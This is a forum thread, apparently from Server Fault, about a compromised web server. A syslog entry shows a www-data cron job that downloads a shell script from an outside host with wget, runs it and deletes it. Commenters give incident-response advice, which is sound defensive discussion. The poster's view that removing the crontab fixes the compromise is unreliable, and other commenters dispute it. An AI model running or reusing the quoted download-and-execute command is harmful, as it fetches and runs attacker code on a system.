# found php malware detected on syslog

Tags: syslog, malware

I have a malware which run every minute, i can see it from /var/log/syslog

```
Feb  1 18:30:01 MENCH CRON[1768]: (www-data) CMD (wget -q -O xxxd http://hello.hahaha666.xyz/xxxd && chmod 0755 xxxd && /bin/sh xxxd /var/www/website.com 24 && rm -f xxxd)
```

how can i find out which php script is being executed by?

On the server i have only nginx, php fpm with 4 small websites and mysql. nothing more

**update**
by stopping nginx that call continues to be executed every minute

Comment: Why is that system still running? It's obviously compromised, and you cannot do more good things with it than it's currently doing bad things. Power it off. Make an offline backup, set up a clean system with completely different authentication data, database connections and so on, and carefully restore service from the backup, without accidentally moving over any malware. Also, if this system dealt with any user data, you **must** now inform your users that you've been compromised and any data that they handed to your system might now be in a malicious actor's hands.

Comment: to stress that: **Continuing to operate your server not only reduces your ability to analyze what went wrong, it also is ethically untenable, because your server might be continuing to exfiltrate data that's being entrusted to you, or attack or spam other systems.** Power it off.

Comment: by the way, that is a command and control instance. It polls a server for new commands to execute locally. Letting this run one more second can mean the attacker deletes everything on the server, leaving no traces of their acts, and taking everything valuable about the system with them, anyways. Power. It. Off.

Comment: (and that command & control wasn't even written by someone with a good background in Linux/Unixoid systems; both the way they do this and the fact that you're seeing what they're doing in the logs is bad amateur work.)

Comment: See [How do I deal with a compromised server?](https://serverfault.com/questions/218005/how-do-i-deal-with-a-compromised-server)

Comment: The command is run by `cron`. Check files under `/etc/cron*` and in `/var/spool/cron/crontabs/` for user `www-data`.  As others recommend, you should do this after 1. stopping the current system and 2. mounting the disk on a different host in a readonly noexec mode. That means you may have to check paths with a different leading path, like `/mnt/sdb1/var/spool/cron/crontabs`.  MMV

Comment: Thank you there was a www-data file into /var/spool/cron/crontabs .... solved

i don't agree with migrating to a new instance, the server is well secured it's only exposed as a webserver of 3 small sites checked daily. With the user www-data the script could not do anything in fact it was called empty

Answer (score 0):

there was a www-data file into /var/spool/cron/crontabs created by some php scripts. Solved

Comment: There is a multitude of ways for persisting in the system after the initial penetration. So, **backup logs that will help you do track the vulnerability and then you have to resinstall and reconfigure the system from scratch**. Yes, a lot of work, but it's **absolutely required minimum**. The "how to deal with a compromised server" (link above) is a must read and explains this in detail. **For all readers**: don't calm down. Really. It didn't finished yet, it's only started. **There is no easy and fast solution** (unless you came prepared).